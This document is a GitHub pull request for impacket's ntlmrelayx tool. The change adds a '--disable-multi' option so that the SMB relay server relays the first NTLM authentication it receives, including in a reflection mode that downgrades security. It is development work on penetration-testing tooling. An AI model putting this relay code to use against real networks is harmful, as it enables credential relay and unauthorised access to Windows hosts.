### PR TITLE
--disable-multi parameter

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -145,6 +145,7 @@ def start_servers(options, threads):
         c.setExeFile(options.e)
         c.setCommand(options.c)
         c.setEnumLocalAdmins(options.enum_local_admins)
+        c.setDisableMulti(options.disable_multi)
         c.setEncoding(codec)
         c.setMode(mode)
         c.setAttacks(PROTOCOL_ATTACKS)
@@ -259,6 +260,7 @@ if __name__ == '__main__':
                         'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
                                                           'directory).')
     smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
+    smboptions.add_argument('--disable-multi', action='store_true', required=False, help='If set, disable multi-host relay (in case Guest authentication is disabled')
 
     #MSSQL arguments
     mssqloptions = parser.add_argument_group("MSSQL client options")

--- a/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/smbrelayserver.py
@@ -118,6 +118,34 @@ class SMBRelayServer(Thread):
         respPacket['Command'] = smb3.SMB2_NEGOTIATE
         respPacket['SessionID'] = 0
 
+        # Do not use multi-target feature
+        if self.config.disableMulti:
+            if self.config.mode.upper() == 'REFLECTION':
+                self.targetprocessor = TargetsProcessor(singleTarget='SMB://%s:445/' % connData['ClientIP'])
+
+            self.target = self.targetprocessor.getTarget()
+
+            LOG.info("SMBD-%s: Received connection from %s, attacking target %s://%s" % (connId, connData['ClientIP'], self.target.scheme,
+                                                                                      self.target.netloc))
+
+            try:
+                if self.config.mode.upper() == 'REFLECTION':
+                    # Force standard security when doing reflection
+                    LOG.debug("Downgrading to standard security")
+                    extSec = False
+                    #recvPacket['Flags2'] += (~smb.SMB.FLAGS2_EXTENDED_SECURITY)
+                else:
+                    extSec = True
+                # Init the correct client for our target
+                client = self.init_client(extSec)
+            except Exception as e:
+                LOG.error("Connection against target %s://%s FAILED: %s" % (self.target.scheme, self.target.netloc, str(e)))
+                self.targetprocessor.logTarget(self.target)
+            else:
+                connData['SMBClient'] = client
+                connData['EncryptionKey'] = client.getStandardSecurityChallenge()
+                smbServer.setConnectionData(connId, connData)
+
         if isSMB1 is False:
             respPacket['MessageID'] = recvPacket['MessageID']
         else:
@@ -175,9 +203,10 @@ class SMBRelayServer(Thread):
         #############################################################
         # SMBRelay
         # Are we ready to relay or should we just do local auth?
-        if 'relayToHost' not in connData or ('Authenticated' in connData and connData['Authenticated']):
-            # Just call the original SessionSetup
-            return self.origSmbSessionSetup(connId, smbServer, recvPacket)
+        if not self.config.disableMulti:
+            if 'relayToHost' not in connData or ('Authenticated' in connData and connData['Authenticated']):
+                # Just call the original SessionSetup
+                return self.origSmbSessionSetup(connId, smbServer, recvPacket)
 
         # We have confirmed we want to relay to the target host.
         respSMBCommand = smb3.SMB2SessionSetup_Response()
@@ -358,6 +387,8 @@ class SMBRelayServer(Thread):
         self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode ('utf-16le'),
                                     authenticateMessage['user_name'].decode ('utf-16le'))).upper ()
 
+        if self.config.disableMulti:
+            return self.origsmb2TreeConnect(connId, smbServer, recvPacket)
         # Uncommenting this will stop at the first connection relayed and won't relaying until all targets
         # are processed. There might be a use case for this
         #if 'relayToHost' in connData:

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -53,6 +53,7 @@ class NTLMRelayxConfig:
         self.command = None
         self.interactive = False
         self.enumLocalAdmins = False
+        self.disableMulti = False
 
         # LDAP options
         self.dumpdomain = True
@@ -107,6 +108,9 @@ class NTLMRelayxConfig:
 
     def setEnumLocalAdmins(self, enumLocalAdmins):
         self.enumLocalAdmins = enumLocalAdmins
+
+    def setDisableMulti(self, disableMulti):
+        self.disableMulti = disableMulti
 
     def setEncoding(self, encoding):
         self.encoding = encoding


### PR DESCRIPTION
## Context
As explained in issue #794, newer versions of Windows disable SMB guest authentication by default.

https://support.microsoft.com/en-us/help/4046019/guest-access-in-smb2-disabled-by-default-in-windows-10-and-windows-ser

Since guest access is disabled by default, the server doesn't open an SMB session after authentication, and thus does not request a tree ID.
It means the first authentication (not relayed because of multi-target feature) will be discarded, and the `STATUS_NETWORK_SESSION_EXPIRED` will never be sent because the client never requested a Tree.

Older versions of impacket directly relayed the 1st authentication, so it worked because from the client's point of view, this was an authenticated access.

## Fix

This PR adds a `--disable-multi` parameter to ntlmrelayx so that it relays the 1st received authentication, like it did before.

## Example

Here's a simple example in my lab.

![disable-multi](https://user-images.githubusercontent.com/11051803/79228302-81090180-7e61-11ea-89c5-4eba25e4d57e.gif)

## Note
As I said to @asolino already, I don't have the full picture. It may be incomplete, as it may break some existing features/constraints I'm not aware of.